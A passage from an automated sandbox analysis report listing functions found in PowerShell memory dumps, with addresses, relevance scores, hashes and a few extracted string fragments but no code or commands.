                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: d70629b438ce484e1562c4acbcba4e1d9e364e392f0ff7941bf79d61e1f3088d
                                                      • Instruction ID: 3a7ef8c1f05c577c67f5d2e4fb49b46f3724e6a17d049bc496be1cec3d97e187
                                                      • Opcode Fuzzy Hash: d70629b438ce484e1562c4acbcba4e1d9e364e392f0ff7941bf79d61e1f3088d
                                                      • Instruction Fuzzy Hash: D7B13622B2FA8D5FEBE5DB6C48A46B57BD0EF55220B0901FBD05DCB1E3E918AD058341
                                                      Function 00007FFD9B9746C9 Relevance: .4, Instructions: 362COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 48a1579241a6b969181d980658c394b88ccc2581e40265b5a0ddc2bc80265ee6
                                                      • Instruction ID: 6f299007ba2daba5817d437123102a5732fb48b203939bef7d3f92648f0ff7b7
                                                      • Opcode Fuzzy Hash: 48a1579241a6b969181d980658c394b88ccc2581e40265b5a0ddc2bc80265ee6
                                                      • Instruction Fuzzy Hash: C8A13C22B1FA8E1FF769976858A57B937C1EF52620F0501BFD05DC32E3ED18A9018341
                                                      Function 00007FFD9B8ABAB6 Relevance: .3, Instructions: 331COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1832822227.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 77c2493154e20553651401617687eb7363760f9895472513ad4d3171cd450723
                                                      • Instruction ID: 013c2c1e79e2572d7a4fd41c7a886342c61730b3d357b0ec5dc9151816e0ee9b
                                                      • Opcode Fuzzy Hash: 77c2493154e20553651401617687eb7363760f9895472513ad4d3171cd450723
                                                      • Instruction Fuzzy Hash: 42B1B57060DA8D8FDB69DF28C855BE93BE1EF59310F04426EE84DC7296DE349941CB82
                                                      Function 00007FFD9B97A9CA Relevance: .2, Instructions: 217COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: db9bcb0210eb4528314f664c445135bae08d64a510e233d885bfc28afe757d6b
                                                      • Instruction ID: 820336806d06740a55fcba2d057da5a2ba8a787e669ac4879158c9935d0722e4
                                                      • Opcode Fuzzy Hash: db9bcb0210eb4528314f664c445135bae08d64a510e233d885bfc28afe757d6b
                                                      • Instruction Fuzzy Hash: B761F921B1E7CD1FEB66976858A55A57FE1EF52210B0A01FBD48CCB0F3DA189D09C351
                                                      Function 00007FFD9B975792 Relevance: .1, Instructions: 112COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 168086b7b11399a0ab6dba5e8742f703f40667046fd01948132e4898b2b94514
                                                      • Instruction ID: aceb065565decbecfb2652452bbc1b7f11d04c5d00e8fb5734f6131b710f0bda
                                                      • Opcode Fuzzy Hash: 168086b7b11399a0ab6dba5e8742f703f40667046fd01948132e4898b2b94514
                                                      • Instruction Fuzzy Hash: D031E462F2FA8A5BF7F597A818B11B867C0EF50650F5901FAD46DCB1F3ED0869014342
                                                      Function 00007FFD9B974854 Relevance: .1, Instructions: 99COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f478cac43b715700fad4aefc474d546de0df9852c2938cdb943495b5308cfc31
                                                      • Instruction ID: bad240648b590462fb8e83b4df7e0024b5efa2dc6936aa5be174219366a2ac23
                                                      • Opcode Fuzzy Hash: f478cac43b715700fad4aefc474d546de0df9852c2938cdb943495b5308cfc31
                                                      • Instruction Fuzzy Hash: 1321C822B2FA9D1BF3B9976858A52B863C1EF95620B4900FED15DC72E3ED19AC018201
                                                      Function 00007FFD9B8AB5B4 Relevance: .1, Instructions: 92COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1832822227.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 34b82c03a47451bb79f02e92d8cff7fd78533c96e27ed9589331368919faaa3a
                                                      • Instruction ID: 92c7fa4708492259b0de18bab69a662a16e71e7eb4891f4172da079d5c8eda41
                                                      • Opcode Fuzzy Hash: 34b82c03a47451bb79f02e92d8cff7fd78533c96e27ed9589331368919faaa3a
                                                      • Instruction Fuzzy Hash: 94311630A1964ECEFBB49F65CC25BF932D4FF49719F410139D40D860A2DB396A45CB21
                                                      Function 00007FFD9B97189F Relevance: .1, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 49f4b8c3dbb84eb1dfd0b9958a05af67642af3bc3882e82ac5c11d415affcd6e
                                                      • Instruction ID: 8c2925929e68e27f017eaf3ea34fcbe221a304217d8494350a359005edafb52a
                                                      • Opcode Fuzzy Hash: 49f4b8c3dbb84eb1dfd0b9958a05af67642af3bc3882e82ac5c11d415affcd6e
                                                      • Instruction Fuzzy Hash: DF212853F1F6DA2FF7A5A76C18A51B42BD1EF66658B0900FFD0ADCB0E3D81819068352
                                                      Function 00007FFD9B979B7F Relevance: .1, Instructions: 68COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5de75e0a4ab0ef5b34e00f33496da4bcd8437b5526c87f1af9e89e57580f53ab
                                                      • Instruction ID: 66bf7cad0c6377dc948e1f9500cfad99e43eb3eac4c8e9fdb83aed618e39f565
                                                      • Opcode Fuzzy Hash: 5de75e0a4ab0ef5b34e00f33496da4bcd8437b5526c87f1af9e89e57580f53ab
                                                      • Instruction Fuzzy Hash: FB110862F0E7891FEB699A6C58A66E8B7E1EF51320F0802FAD09D870E3DD1829044741
                                                      Function 00007FFD9B8A3945 Relevance: .0, Instructions: 49COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1832822227.00007FFD9B8A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B8A0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b8a0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction ID: 04b822a5e3d45822b76be075df3c081dc68bfd048355e8304278f52f19c5101e
                                                      • Opcode Fuzzy Hash: 5e0cd8e44b86cda1606cdcda3d5cd9c82b965f1b77ca43a9ede1ee8a995a9426
                                                      • Instruction Fuzzy Hash: F401677121CB0D4FD748EF0CE451AA5B7E0FB99364F10056DE58AC36A5D636E881CB45
                                                      Function 00007FFD9B97974A Relevance: .0, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1dbe015000aeb287ad996944082dbfa86d297fbee1ee011f0e9dc7ba11da3e99
                                                      • Instruction ID: dfaca2aadd3c7924e25e7da5a9b206a82895a63983d2c14446639772503e1807
                                                      • Opcode Fuzzy Hash: 1dbe015000aeb287ad996944082dbfa86d297fbee1ee011f0e9dc7ba11da3e99
                                                      • Instruction Fuzzy Hash: 4A01D622B1EA8A6FEBB5EA6C48E587477D0DF66310B4D04FAC04DCB1F3D819AD448341
                                                      Function 00007FFD9B97794A Relevance: .0, Instructions: 37COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: fc4f3063999b0813624228ca784945a57f627312c7e5b9a86fc386bc61965954
                                                      • Instruction ID: fcad22d94fdf8b939bdcee16423916f801e998fc29026c6e677e2bb61a8acc32
                                                      • Opcode Fuzzy Hash: fc4f3063999b0813624228ca784945a57f627312c7e5b9a86fc386bc61965954
                                                      • Instruction Fuzzy Hash: ABF0E533B5EA0D4EE395966C68551F973D2EFC8131B550277C15EC3196ED15D4064280
                                                      Function 00007FFD9B977D09 Relevance: .0, Instructions: 30COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.1833626177.00007FFD9B970000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B970000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_2_2_7ffd9b970000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 36a84361b5bfda2d05af14c9769aca226c5b1c3090a98c05a9318453fbb1638f
                                                      • Instruction ID: 51484f0ca9cc402ea2ae2f26155a6d1881095f12380e0b5e046e8b0e124e939c
                                                      • Opcode Fuzzy Hash: 36a84361b5bfda2d05af14c9769aca226c5b1c3090a98c05a9318453fbb1638f
                                                      • Instruction Fuzzy Hash: C2E0DF33B2EA090AFB9DA65C3C624F8B3D1DF85131B55087FD14EC3097E91AA8264245

                                                      Executed Functions

                                                      Function 06FB2C28 Relevance: 20.6, Strings: 16, Instructions: 640COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$84!l$84!l$tP^q$tP^q$$^q$$^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-685555545
                                                      • Opcode ID: 6775b1c3517a6974c2e7ff80deb3c7b305dc39e898f49e7ad3ea4b6895b35995
                                                      • Instruction ID: 3729412f00c0e83ff9dba3b3a711f002bb7526443d10b08c4c6a632afa2e14dc
                                                      • Opcode Fuzzy Hash: 6775b1c3517a6974c2e7ff80deb3c7b305dc39e898f49e7ad3ea4b6895b35995
                                                      • Instruction Fuzzy Hash: 55224832F052449FDB558B2AD814AFBBFB6AF85210F1894AAE804CF256DB31C945C7A1
                                                      Function 06FB84A8 Relevance: 15.5, Strings: 12, Instructions: 491COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q$tP^q$tP^q$$^q$$^q$$^q$$^q
                                                      • API String ID: 0-1227835634
                                                      • Opcode ID: ef0a13a549a292b963d48c0e205f4bd91e7be9bc21078d955101b93db785ddc0
                                                      • Instruction ID: fc7ced779e667d474aa2ca02b209b39cdc59b3f4c25a378dbc902fbc31321e3e
                                                      • Opcode Fuzzy Hash: ef0a13a549a292b963d48c0e205f4bd91e7be9bc21078d955101b93db785ddc0
                                                      • Instruction Fuzzy Hash: E1F14D31F042089FDB549F6AC8046EABBEAAFC5390F14946AD425CF395DB32CC45CBA1
                                                      Function 06FB53C8 Relevance: 13.5, Strings: 10, Instructions: 971COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$(f#l$4'^q$4'^q
                                                      • API String ID: 0-2199011432
                                                      • Opcode ID: ce71ae8682e1af1d685dcfdd2ff8fca7403000ecd45b670281c070f34ef92aec
                                                      • Instruction ID: 761a75bc2bf5a1ddde15601678a5fa714c2e67eb71b5fd2ea854fd6a1f337f64
                                                      • Opcode Fuzzy Hash: ce71ae8682e1af1d685dcfdd2ff8fca7403000ecd45b670281c070f34ef92aec
                                                      • Instruction Fuzzy Hash: 96926B74F00218DFDBA0CB19C941B99BBB2BB89310F14C0A9D909AB351DB76ED85CF91
                                                      Function 06FB6BB8 Relevance: 13.2, Strings: 10, Instructions: 658COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$(f#l$(f#l$4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1137307227
                                                      • Opcode ID: c1839e35bc170cca44c853daf601793b70a318278540df2b9d2b189c6af754ee
                                                      • Instruction ID: e4d879b5e2fbb7266997d03b7b4ecbb14e8fc598909c43bb0b3b8d7ee3cd2409
                                                      • Opcode Fuzzy Hash: c1839e35bc170cca44c853daf601793b70a318278540df2b9d2b189c6af754ee
                                                      • Instruction Fuzzy Hash: 51428D70E002188FDB64DB59C951BAABBB2FF88300F1495A9D909AF355CB32DD85CF91
                                                      Function 06FB53C3 Relevance: 8.3, Strings: 6, Instructions: 763COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$(f#l$(f#l$(f#l$4'^q
                                                      • API String ID: 0-4124179908
                                                      • Opcode ID: 9cf3862435f2f1a15e935ea0e2c5b9833b4a8b858aaf258812723280e54bbe8f
                                                      • Instruction ID: 15b56fc748d4f10584d5032afdc31b5c63a3764fc4931232a323ac860c398bea
                                                      • Opcode Fuzzy Hash: 9cf3862435f2f1a15e935ea0e2c5b9833b4a8b858aaf258812723280e54bbe8f
                                                      • Instruction Fuzzy Hash: 2F724774E00214DFEBA4CB19C941F99BBB2BB89314F14D0A9D909AB351CB76ED85CF90
                                                      Function 06FB7EC8 Relevance: 7.8, Strings: 6, Instructions: 339COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-2822668367
                                                      • Opcode ID: 2f4fa96a7c58bcf88c17b00a98c6d160782a06178207fa76ede989599597564a
                                                      • Instruction ID: 23c61cb0a68af87230dd66f537680e5e92dbd858cd50a9ba1289fb2add090a90
                                                      • Opcode Fuzzy Hash: 2f4fa96a7c58bcf88c17b00a98c6d160782a06178207fa76ede989599597564a
                                                      • Instruction Fuzzy Hash: F7D1B170E002189FDB44DBA9C961B9EBBB2AFC4340F14D469D8156F395CB72DC858B91
                                                      Function 06FBA5C8 Relevance: 5.6, Strings: 4, Instructions: 585COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q$4'^q
                                                      • API String ID: 0-1420252700
                                                      • Opcode ID: f469885323a9e9cf3729034cb76337cf85350215c381ce6ebc10470e7783f956
                                                      • Instruction ID: 1cb923be2d52b7c24266c95c474d7ea728c3aa183f10dd6e6d6b6cde2e47c6af
                                                      • Opcode Fuzzy Hash: f469885323a9e9cf3729034cb76337cf85350215c381ce6ebc10470e7783f956
                                                      • Instruction Fuzzy Hash: 2E125772F042589FDB558B6A98016EBBFA6EFC1310F1494BBD805CB355DA32C981C7E1
                                                      Function 06FB7233 Relevance: 5.4, Strings: 4, Instructions: 395COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l$4'^q$4'^q
                                                      • API String ID: 0-2555332335
                                                      • Opcode ID: 2b3d4fded325a3c7a9e829d4e86dd70d8df150c8208a5b56fcee5a1217ea431b
                                                      • Instruction ID: ef0db6217dcba159bc2c210fe99ff5b77e9a72acef96d7f91b3499e48e7d12df
                                                      • Opcode Fuzzy Hash: 2b3d4fded325a3c7a9e829d4e86dd70d8df150c8208a5b56fcee5a1217ea431b
                                                      • Instruction Fuzzy Hash: BEF17070A002189FDB64DB69CD51FAABBB2BF84340F1084A5D90AAF395CB71DD858F91
                                                      Function 06FB7EC5 Relevance: 4.0, Strings: 3, Instructions: 259COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q$4'^q
                                                      • API String ID: 0-1196845430
                                                      • Opcode ID: 82c2cca6b57785898d2f13a359d62efb54c80a3190b53dd105815453d932f838
                                                      • Instruction ID: 623288adc853dbf4bfad5ad0e616dc0dd3d3a47142e0b9406652a4b4844cedd6
                                                      • Opcode Fuzzy Hash: 82c2cca6b57785898d2f13a359d62efb54c80a3190b53dd105815453d932f838
                                                      • Instruction Fuzzy Hash: 15A18B74E002089FDB54DB99C951B9EBBB2ABC8380F14D469D8256F395CB32EC85CB91
                                                      Function 06FB0F48 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q$$^q
                                                      • API String ID: 0-831282457
                                                      • Opcode ID: 6ae3d984be5aae87df0c37d3beb70ee72fbfda87de7bdd556e4aa0edd26dbef3
                                                      • Instruction ID: d59ecdcb1ae8e37d46a79a459bcaffd12f85dec0eff5f82bfd5556dff2e8b1fc
                                                      • Opcode Fuzzy Hash: 6ae3d984be5aae87df0c37d3beb70ee72fbfda87de7bdd556e4aa0edd26dbef3
                                                      • Instruction Fuzzy Hash: 36217B32F003095FEBB4957B9C10BA7BADA9BC0751F24A43AA409CF385DD36C885C3A0
                                                      Function 06FB5FCA Relevance: 3.0, Strings: 2, Instructions: 500COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$4'^q
                                                      • API String ID: 0-1039660590
                                                      • Opcode ID: dc33a9b8c50122ec7ab0eea972a8778cedecff289f37704d6e9839075dbfd81b
                                                      • Instruction ID: c9fada30e09904d0b492dc711e2e619d6bc03c9ff0e47b5a7dfde546ff4d6c2f
                                                      • Opcode Fuzzy Hash: dc33a9b8c50122ec7ab0eea972a8778cedecff289f37704d6e9839075dbfd81b
                                                      • Instruction Fuzzy Hash: 0C224B74E00214DFEBA4CB19C841F99BBB2BB85314F14D0A9D909AB352CB76ED85CF91
                                                      Function 06FB5020 Relevance: 2.7, Strings: 2, Instructions: 247COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l$(f#l
                                                      • API String ID: 0-2952237724
                                                      • Opcode ID: ecb23f3d15b723dc531bbf69585e8ad603722dd2f66b7a2ddb147422458366cd
                                                      • Instruction ID: 1df67d3a53eea746a79dceab7b0b7fa82bbcb7922c90be0c5a57a6ea9ce00010
                                                      • Opcode Fuzzy Hash: ecb23f3d15b723dc531bbf69585e8ad603722dd2f66b7a2ddb147422458366cd
                                                      • Instruction Fuzzy Hash: 6C91C070B00218AFDB44DF68C951B9EBBE3EB89310F149465E8057F395CB76EC458BA1
                                                      Function 06FB8EA6 Relevance: 2.6, Strings: 2, Instructions: 116COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: 4'^q$4'^q
                                                      • API String ID: 0-2697143702
                                                      • Opcode ID: c12f5f4545ac7bfe4de5465a773ed3a4e6c0d9dbc191e49aa9ba5e9c1c4fdb6d
                                                      • Instruction ID: 4d7c7f035b85178eb0c44d13a8d90cc045c19104c17631c3631d92770463a3c2
                                                      • Opcode Fuzzy Hash: c12f5f4545ac7bfe4de5465a773ed3a4e6c0d9dbc191e49aa9ba5e9c1c4fdb6d
                                                      • Instruction Fuzzy Hash: F1319C32F442448FCF5456B998106EFBB9B9BC13E8B1058BAD9268F395DE32C945C3A1
                                                      Function 06FB0F2C Relevance: 2.6, Strings: 2, Instructions: 83COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: $^q$$^q
                                                      • API String ID: 0-355816377
                                                      • Opcode ID: df0f9bd1895a97fc2cf9111d2353b5af8a5b6243b09f77bb61ce626dde0d21c7
                                                      • Instruction ID: f0234e733680fd32550dace595d5de208ea4a70a422d4ef77986ecf9493526ea
                                                      • Opcode Fuzzy Hash: df0f9bd1895a97fc2cf9111d2353b5af8a5b6243b09f77bb61ce626dde0d21c7
                                                      • Instruction Fuzzy Hash: 2C213531B083846FEB6145364C54BE37FA98B82340F1854ABA844CB286CD399994C3B5
                                                      Function 06FB5000 Relevance: 1.5, Strings: 1, Instructions: 234COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID: (f#l
                                                      • API String ID: 0-4063606093
                                                      • Opcode ID: 90a46f5c7f4390138629d04c888e371b1cbc90222673b22d8f5af6077770f033
                                                      • Instruction ID: 67d30c94ad7d157304e4ab9b4fab20ad3856885e71ba8d6ad3d1c0f8f5cd19e5
                                                      • Opcode Fuzzy Hash: 90a46f5c7f4390138629d04c888e371b1cbc90222673b22d8f5af6077770f033
                                                      • Instruction Fuzzy Hash: 2B91B170A00214AFDB54CF58C951B9EBBB2EF89310F189469E905BF391CB76EC45CBA1
                                                      Function 06FBA5AC Relevance: .1, Instructions: 139COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: ad7b3e9a4c7e2de478c836c7379e9fcf9a71bc588051cfbdbcc479d5b4036f3b
                                                      • Instruction ID: 64037c7187ecea539782c96773a9a7cb0ee302b8acbeb7a2de5db4122b095d68
                                                      • Opcode Fuzzy Hash: ad7b3e9a4c7e2de478c836c7379e9fcf9a71bc588051cfbdbcc479d5b4036f3b
                                                      • Instruction Fuzzy Hash: 22417BB1E04310AFDBA18E2A8841BE7BFF7EB81250F2990A6D804CF215D775D941CBB1
                                                      Function 06FB82EE Relevance: .1, Instructions: 102COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6fb0000_powershell.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f09a8a35367d9d3f053774f152c661cb3c031ed860e5d42e375f5ab18dcfaee6
                                                      • Instruction ID: 76e9165384145c30bb80efaa9a8fb9db92277225b39e56a4017628212bbe37dd
                                                      • Opcode Fuzzy Hash: f09a8a35367d9d3f053774f152c661cb3c031ed860e5d42e375f5ab18dcfaee6
                                                      • Instruction Fuzzy Hash: 4731B370B40218AFDB04A7A8C925FAEBBA3EBC4740F148824E9156F395CE769C418BD1
                                                      Function 06FB0E18 Relevance: .1, Instructions: 94COMMON
                                                      Download Yara Rule
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.1971601810.0000000006FB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06FB0000, based on PE: false
